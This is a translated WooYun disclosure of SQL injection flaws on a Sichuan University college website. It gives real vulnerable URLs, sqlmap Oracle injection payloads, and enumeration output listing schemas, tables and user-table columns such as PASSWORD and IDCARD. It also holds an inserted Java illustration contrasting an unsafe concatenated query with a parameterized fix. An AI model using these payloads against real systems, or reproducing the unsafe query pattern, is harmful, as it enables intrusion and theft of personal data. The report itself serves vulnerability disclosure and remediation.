
Vulnerability summary

Defect ID: wooyun-2015-0157934

Title: SQL injection bundle at a college of Sichuan University (affects 300,000 users)

Vendor: Sichuan University Information Management Center

Author: 路人甲

Submitted: 2015-12-03 15:54

Fixed: 2016-01-17 17:46

Published: 2016-01-17 17:46

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-12-03: Details sent to the vendor, awaiting vendor handling
2015-12-03: Vendor confirmed; details disclosed to the vendor only
2015-12-13: Details disclosed to core white hats and domain experts
2015-12-23: Details disclosed to regular white hats
2016-01-02: Details disclosed to intern white hats
2016-01-17: Details disclosed to the public

Brief description:

Detailed description:

http://www.scude.cc/webpage/news.jsp?na=%D1%A7%D4%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&type=1
http://www.scude.cc/student_s2008/activity/activityView.jsp?id=19673
http://www.scude.cc/student_s2008/studentInfo/studentinfo_view.jsp?id=318
http://www.scude.cc/student_s2008/faq/FAQList.jsp?type=2
http://www.scude.cc/net_register/register/departmentView.jsp?code=01
http://www.scude.cc/scu/xyyw/xyyw.jsp?id=10629
http://www.scude.cc/wangluo/publicInfo/jiaowuguanli/forms.jsp?keyword=&count=50
http://www.scude.cc/wangluo/publicInfo/jiaowuguanli/files.jsp?keyword=&count=50
http://www.scude.cc/student_s2008/faq/FAQ_view.jsp?id=50195
http://www.scude.cc/student_s2008/faq/FAQList.jsp?keyword=&count=50&type=2
http://www.scude.cc/student_s2008/play_article/play_article_layout.jsp?subjectid=4
http://www.scude.cc/student_s2008/play_article/comment_on.jsp?layout_id=41
http://www.scude.cc/student_s2008/play_7/photo_layout.jsp?topage=279&subjectid=7&onclick=2362


Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: na=%D1%A7%D4%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&type=1 AND 4830=4830
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: na=%D1%A7%D4%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&type=1 AND 2113=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (2113=2113) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: na=%D1%A7%D4%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&type=1 AND 1159=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(75)||CHR(122)||CHR(70),5)
---
web application technology: JSP
back-end DBMS: Oracle
available databases [18]:
[*] CTXSYS
[*] DBSNMP
[*] DEVELOP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SCUDE_THESIS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] THESIS
[*] TSMSYS
[*] WMSYS
[*] XDB
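The findings above all stem from one root cause on a JSP front end with an Oracle back end: request parameters such as `type` and `id` are concatenated into SQL text, so the boolean, error-based and time-based probes shown are evaluated by the database. The following Java data-access class is an added illustration, not code from the affected site or from this report; the class, table and column names (`NewsDao`, `NEWS`, `TITLE`, `NAME`, `TYPE`) are assumptions, since the report does not disclose the real query. It places the concatenation pattern that produces such findings beside the hardened form that uses bind parameters and parses the numeric parameter before it reaches the driver.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

/**
 * Hypothetical data-access class behind a page like news.jsp?na=...&type=1.
 * Table and column names are assumed for illustration only.
 */
public class NewsDao {

    private final Connection conn;

    public NewsDao(Connection conn) {
        this.conn = conn;
    }

    /**
     * The pattern that produces findings like the ones in this report:
     * request parameters spliced into the SQL string, so whatever the
     * client appends to "type" becomes part of the WHERE clause.
     */
    public List<String> findTitlesUnsafe(String na, String type) throws SQLException {
        String sql = "SELECT TITLE FROM NEWS WHERE NAME = '" + na + "' AND TYPE = " + type;
        try (Statement st = conn.createStatement();
             ResultSet rs = st.executeQuery(sql)) {
            return collectTitles(rs);
        }
    }

    /**
     * Hardened form: the SQL text is constant, values travel as bind
     * parameters, and "type" is converted to the integer the schema
     * expects before the driver ever sees it.
     */
    public List<String> findTitlesSafe(String na, String type) throws SQLException {
        int typeId = parseId(type); // rejects anything that is not a plain integer
        String sql = "SELECT TITLE FROM NEWS WHERE NAME = ? AND TYPE = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, na);
            ps.setInt(2, typeId);
            try (ResultSet rs = ps.executeQuery()) {
                return collectTitles(rs);
            }
        }
    }

    /** Accepts only a short non-negative integer; null, signs, spaces or SQL fragments are rejected. */
    static int parseId(String raw) {
        if (raw == null || !raw.matches("\\d{1,9}")) {
            throw new IllegalArgumentException("invalid numeric parameter");
        }
        return Integer.parseInt(raw);
    }

    private static List<String> collectTitles(ResultSet rs) throws SQLException {
        List<String> titles = new ArrayList<>();
        while (rs.next()) {
            titles.add(rs.getString("TITLE"));
        }
        return titles;
    }
}
```

With bind parameters the three techniques sqlmap reports cannot reach the parser: the driver sends `type` as a number and `na` as a string value, never as SQL text. The error-based (XMLType) and time-based (DBMS_PIPE) variants additionally depend on database error messages or measurable delays being observable from the client, so the servlet layer should also map `SQLException` to a generic error page rather than echoing the Oracle message, and the application's database account should be limited to the `DEVELOP` objects it actually needs instead of being able to enumerate the 18 schemas listed above.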

Proof of vulnerability:

back-end DBMS: Oracle
Database: DEVELOP
[287 tables]
+------------------------------+
| ADDRESSLIST |
| BASE_COLLEGE |
| BASE_COLLEGER |
| BASE_CONNECTOR |
| BASE_DEPARTMENT |
| BASE_GROUP |
| BASE_LEARNCENTER |
| BASE_PROVINCE |
| BASE_ROLE |
| BASE_SCHOOLER |
| BASE_STAFF |
| BASE_STUDENT |
| BASE_TEACHER |
| BASE_USER |
| BBS_ACTLOG |
| BBS_ATTACHMENT |
| BBS_CATEGORY |
| BBS_FORUM |
| BBS_PHRASES |
| BBS_THREAD |
| BBS_TOPIC |
| BBS_USERINFO |
| CLASS |
| CLASS_TMP |
| CLASS_TONGJI |
| COLLEGE |
| COLLEGE_COURSE |
| COLLEGE_SP |
| COLLEGE_STUDENTSCORE |
| COURSE |
| COURSERESOURCE |
| COURSEWARE |
| COURSEWAREID |
| COURSE_COURSEWARE |
| COURSE_RESOURCE |
| DATUMDOC |
| DELETE_STU_USERS |
| DELETE_USERS |
| DEPART |
| DEPARTMENT |
| DEPARTMENT_LXFX |
| DEPARTMENT_SUB |
| DISCMANAGE |
| ENGLISHAPPLICATION |
| ENGLISHAPPLICATIONTIME |
| EXAMPACKAGE_INFO |
| EXAMPACKAGE_INFO_BAK |
| EXAMPACKAGE_INFO_U4 |
| EXAMPACKGE_OPEN_INFO |
| EXAMTIME |
| EXCELLENT_STUDENT_BATCH |
| EXCELLENT_STUDENT_LIST |
| FAMOUS_TEACHER |
| FAQ |
| FAQ_TYPE |
| FAZHANTMP |
| FAZHAN_RESULT |
| FILEATTACHMENT |
| FRESHMAN_CHANGE1 |
| GRADUATED_STUDENT |
| HOMEPAGE_DETAIL |
| HOMEWORK |
| HOMEWORKENDSCORE |
| HOMEWORKINSTANCE |
| HOMEWORK_JUDGEMENT |
| HOMEWORK_MULTISELECTION |
| HOMEWORK_SCORE_HECHANG_TMP |
| HOMEWORK_SCORE_HECHENG |
| HOMEWORK_SCORE_HECHENG_SAN |
| HOMEWORK_SCORE_LAST |
| HOMEWORK_SCORE_LAST_BAK |
| HOMEWORK_SCORE_SECOND |
| HOMEWORK_SCORE_TEST |
| HOMEWORK_SCORE_TEST2 |
| HOMEWORK_SINGLESELECTION |
| HWANSWER |
| HWLIB |
| HWPAPER |
| HWPAPERITEMS |
| HW_HOMEWORK |
| HW_HOMEWORKINSTANCE |
| HW_HOMEWORKINSTANCE_TEMP |
| HW_HOMEWORKINSTANCE_TEMP2 |
| HW_HOMEWORK_JUDGEMENT |
| HW_HOMEWORK_MULTISELECTION |
| HW_HOMEWORK_SINGLESELECTION |
| HW_JUDGEMENT |
| HW_SELECTION |
| HW_SELECTIONOPTION |
| HW_SELECTION_SELECTIONOPTION |
| HW_WORKANSWER |
| HW_WORKRECORD |
| HW_WORKRECORD_ANSWERS |
| HW_WORKRECORD_BAK |
| HW_WORKRECORD_ST |
| IMAGE |
| IMAGE2_TEMP |
| JANNOUNCE |
| JDKSH |
| JDOWNLOADFILES |
| JDOWNLOADFILESDIR |
| JIAOCAI_LIST |
| JIAOCAI_LIST2 |
| JIKAO_SCORE |
| JP_COURSE |
| JP_FORUM |
| JP_FORUM_REVERT |
| JP_FORUM_TOPIC |
| JSHOUSE |
| J_AFID_DFID |
| LEARNCENTERCONNECTOR |
| LISTATTACHMENT |
| LOGINBANK_LOG |
| LW_ATTACHMENT |
| LW_SET |
| LW_USERS |
| LW_XT |
| MANAGER |
| MEMO |
| MESSAGE_BOARD |
| MIYTEMP |
| MIYTEST |
| MYFRIEND |
| NEWSTYPE |
| NJNB |
| NOPHOTO |
| NOTE |
| OATONGKAO |
| OPEN_LEARNCENTER |
| OPEN_SCORE |
| OPEN_STUDENT |
| OPEN_TUITIONRECORD |
| OPEN_TUITIONSTANDARD |
| PHOTO |
| PICTUREUPLOADDIR |
| PLAN_TABLE |
| PLAY_ARTICLE |
| PLAY_ARTICLE_LAYOUT |
| PLAY_ARTICLE_PL |
| PLAY_ATTACHMENT |
| PLAY_INPUT |
| PLAY_LAYOUT |
| PLAY_LAYOUT_HD |
| PLAY_PHOTO |
| PLAY_PHOTOB |
| PLAY_PHOTO_GUIDANG |
| PLAY_REGISTER |
| PLAY_REGISTERTEACHER |
| PLAY_SUBJECT |
| PLAY_SUBJECT_TYPE |
| PRACTICE_BATCH |
| PRACTICE_CONTENT |
| PRACTICE_COURSE |
| PRACTICE_GRADE |
| PRACTICE_MATCHTEACHER |
| PRACTICE_TOPIC |
| PRE_STUDENT |
| PS_RESOURCE_SCORE |
| PS_RESOURCE_SCORE_BAK |
| PS_RESOURCE_VIEW |
| PUBLICRESOURCE |
| QK_SET |
| QZPXS |
| RECORD_SCORE |
| RECRUIT_TIME |
| RESOURCE_LIST |
| RESOURCE_STUDENT |
| RESOURCE_STUDENT_DETAIL |
| RESOURCE_STUDENT_DETAIL_BAK |
| RESOURCE_STUDENT_TOTAL |
| REVIEWDOC |
| ROLE |
| SCOREJIDIAN |
| SCORE_EXERCISE |
| SCORE_SCALE |
| SCORE_TTUTORSHIP |
| SCORE_UPLOAD |
| SCORE_UPLOAD_BAK |
| SCUDE_BBS_ACTLOG |
| SCUDE_BBS_ATTACHMENT |
| SCUDE_BBS_CATEGORY |
| SCUDE_BBS_COURSE |
| SCUDE_BBS_FORUM |
| SCUDE_BBS_POST |
| SCUDE_BBS_ROLE |
| SCUDE_BBS_TOPIC |
| SCUDE_BBS_USER |
| SCUDE_BBS_USERFACE |
| SCUDE_BBS_USER_FORUM |
| SELECTION |
| SELECTIONOPTION |
| SELECTION_SELECTIONOPTION |
| SEMESTERREG |
| SJKC |
| SPECIALITY |
| SPECIALITYINFO |
| SPECIALITYLIST |
| SPECIALITYRESOURCE |
| SP_BAK |
| STUDENTID_ALTER |
| STUDENTINFO |
| STUDENTINPUTTABLE |
| STUDENTINPUTTABLE1 |
| STUDENTINPUT_JCQK |
| STUDENTRECORD |
| STUDENT_FEESTANDARD |
| STUDENT_HWINFO |
| STUDENT_HWSCORE |
| STUDENT_MOVE |
| STUDENT_MOVE_SCORE |
| STUDENT_MOVE_TYPE |
| STUDENT_SCORE |
| STUDENT_SCORE1127 |
| STUDENT_SCORE_GUIDANG |
| STUDENT_SCORE_JIANKONG |
| STUDENT_SCORE_KAOSHI |
| STUDENT_SCORE_KAOSHI_BAK1 |
| STUDENT_SCORE_KAOSHI_MD |
| STUDENT_SCORE_KAOSHI_U4 |
| STUDENT_SCORE_RE_TMP |
| STUDENT_SCORE_TMP |
| STUDENT_SCORE_TMP_BAK |
| STUDENT_SCORE_TMP_COPY |
| STUDENT_SCORE_TMP_ZUOYE |
| STUDENT_SCORE_TONGJI |
| STUDY_STYLE |
| STU_USERS |
| STU_USERS_COPY |
| STU_USERS_MODI |
| STU_USERS_ZAIJI |
| SUBJECT |
| TABLE_FILE |
| TCHPROGRESS |
| TCHPROGRESS_BEIFEN |
| TCHSCHEDULE |
| TEACHERSCORE |
| TEACHER_HWCODE |
| TEACHER_ZC |
| TESTTYPE |
| THESIS_MANAGER_ROLE |
| TIMESET |
| TK |
| TMP |
| TONGKAOSCORE |
| TONGKAOSCORE20130116QIAN |
| TONGKAOSCORE_JIANKONG |
| TONGKAOSCORE_TEST |
| TONGKAO_MODIFY |
| TONGKAO_SCORE |
| TONGKAO_SCORE_SOURCE |
| TONGKAO_TONGJI |
| TUITIONDISKRECORD |
| TUITIONRECORD |
| TUITIONSTANDARD |
| T_RETRIEVE_LOG |
| T_STUDENT_PAY |
| USERS |
| USERS_LOGIN_DETAIL |
| USERS_LOGIN_RECORD |
| USERS_LOGIN_RECORD_20080710 |
| USERS_TMP |
| VOTESOURCE |
| VOTE_DIANXIN |
| VOTE_FAQ |
| WEILINGZ |
| WEILINGZ2 |
| WISDOM |
| WORKANSWER |
| WORKRECORD |
| WORKRECORD_ANSWERS |
| XJQC |
| XJQC2014 |
| XJQC20141211 |
| XJQC_FJ |
| XJQC_GRADUATE |
| XSDOWNLOAD |
| XSUPLOAD |
| XSXXPT |
| XW |
| YOUJI |
| YUNXING_COURSE_MODIFY |
| YUNXING_SCHEDULE_MODIFY |
| ZHAOSHENG_SCHOOL |
| ZHAOSHENG_SPECIALITY |
| ZHAOSHENG_STUDENT_NEW |
| ZHAOSHENG_STUDYSTYLE |
| ZXSMD |
+------------------------------+
back-end DBMS: Oracle
Database: DEVELOP
+----------------+---------+
| Table | Entries |
+----------------+---------+
| USERS | 184633 |
| STU_USERS | 149207 |
| SCUDE_BBS_USER | 30292 |
| DELETE_USERS | 4203 |
| BASE_USER | 239 |
+----------------+---------+
Database: DEVELOP
Table: USERS
[45 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| A_DEGREE | NUMBER |
| ADDRESS | VARCHAR2 |
| ANSWER | VARCHAR2 |
| BIRTHDAY | VARCHAR2 |
| BORN | VARCHAR2 |
| CARDTYPE | VARCHAR2 |
| CITY | NUMBER |
| DEGREE | VARCHAR2 |
| E_LEVEL | VARCHAR2 |
| EMAIL | VARCHAR2 |
| G_SCHOOL | VARCHAR2 |
| G_SPECIALITY | VARCHAR2 |
| G_TIME | VARCHAR2 |
| GID | VARCHAR2 |
| GRADUATEID | VARCHAR2 |
| HASHOMEPAGE | VARCHAR2 |
| HOMEPAGE | VARCHAR2 |
| IP | VARCHAR2 |
| NATIONALITY | VARCHAR2 |
| NUMBERID | VARCHAR2 |
| OCCUPATION | VARCHAR2 |
| P_SPECIALITY | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| PAYMENT | NUMBER |
| POSTALCODE | VARCHAR2 |
| POWER | NUMBER |
| QUESTION | VARCHAR2 |
| REALNAME | VARCHAR2 |
| RECENT_IP | VARCHAR2 |
| RECENT_TIME | DATE |
| REG_EMAIL | VARCHAR2 |
| REG_TIME | DATE |
| RESUME | VARCHAR2 |
| SCORE | NUMBER |
| SEX | VARCHAR2 |
| SIGN | VARCHAR2 |
| STATUS | VARCHAR2 |
| STOPCAUSE | VARCHAR2 |
| STUDY_STYLE | VARCHAR2 |
| TEL | VARCHAR2 |
| TONGKAOID | VARCHAR2 |
| TYPE | VARCHAR2 |
| USERID | NUMBER |
| USERNAME | VARCHAR2 |
| USERNAME_NEW | VARCHAR2 |
+--------------+----------+
Database: DEVELOP
Table: STU_USERS
[43 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| LANGUAGE | VARCHAR2 |
| ADDRESS | VARCHAR2 |
| BIRTHDAY | VARCHAR2 |
| CARDTYPE | VARCHAR2 |
| CHECKRESULT | VARCHAR2 |
| CHECKTIME | VARCHAR2 |
| CIVILIZATION | VARCHAR2 |
| CLASSCODE | VARCHAR2 |
| COMPANY | VARCHAR2 |
| CONFIRMDATE | DATE |
| CONFIRMIP | VARCHAR2 |
| CREDITRELIEF | NUMBER |
| EMAIL | VARCHAR2 |
| EN_CHECK_RESULT | VARCHAR2 |
| ENROLLMENT | VARCHAR2 |
| ENROLLTIME | VARCHAR2 |
| ENROLLTYPE | VARCHAR2 |
| EXAMID | VARCHAR2 |
| GRADUATEDATE | VARCHAR2 |
| GRADUATEID | VARCHAR2 |
| GRADUATENUMBER | VARCHAR2 |
| GRADUATESCHOOL | VARCHAR2 |
| GRADUATESPECIA | VARCHAR2 |
| GRADUATETIME | VARCHAR2 |
| IDCARD | VARCHAR2 |
| MOBILE | VARCHAR2 |
| NATIONALITY | VARCHAR2 |
| OCCUPATION | VARCHAR2 |
| PHONE | VARCHAR2 |
| POLITICS | VARCHAR2 |
| POSTCODE | VARCHAR2 |
| PRECREDIT | NUMBER |
| PRINT | NUMBER |
| PRINT_GRADUATE | NUMBER |
| REALNAME | VARCHAR2 |
| REMARK | VARCHAR2 |
| SEX | VARCHAR2 |
| SPECIALITYCODE | VARCHAR2 |
| STATUS | VARCHAR2 |
| TUITION | VARCHAR2 |
| USERNAME | VARCHAR2 |
| XUEJISTATUS | VARCHAR2 |
| XUEZHI | VARCHAR2 |
+-----------------+----------+



Remediation:

Copyright notice: when reposting, please credit the source as 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-12-03 17:44

Vendor reply:

Thank you, dear white hat; this has been forwarded to the relevant department.

Latest status:

None yet